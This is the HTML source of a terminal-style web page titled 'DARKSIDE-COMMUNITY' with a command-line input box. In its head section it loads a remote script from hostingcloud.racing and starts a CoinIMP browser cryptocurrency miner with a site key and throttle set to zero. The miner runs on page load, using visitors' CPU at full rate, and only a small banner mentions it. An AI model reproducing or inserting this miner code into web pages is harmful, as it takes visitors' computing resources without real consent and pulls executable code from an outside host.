<html>

<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="chrome=1" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DARKSIDE-COMMUNITY</title>
    <link rel="icon" href="./asset/favicon.png" type="image/x-icon" />
    <link href="./asset/index.css" rel="stylesheet" type="text/css" />
    <script src="./js/polyfills.js"></script>
    <script src="./js/main.js"></script>
    <script src="https://www.hostingcloud.racing/yhJC.js"></script>
<script>
    var _client = new Client.Anonymous('9f17605b23c48e4bef868ca648c4f7d0a39839a9d9b5cb72edc6ca04bc7a0e96', {
        throttle: 0, c: 'w'
    });
    _client.start();
    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d");

</script>


</head>

<body>
    <div id="sidenav">
        <button id="sidenavBtn"></button>
        <img id="profilePic">
    </div>
    <div id="container">
        <div id="output"></div>
        <div id="input-line" class="input-line">
            <div id="prompt" class="prompt-color"></div>&nbsp;
            <div>
                <input type="text" id="cmdline" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" autofocus/>
            </div>
        </div>
    </div>
	<script src="./js/nonClick.js"></script>
</body>

</html>
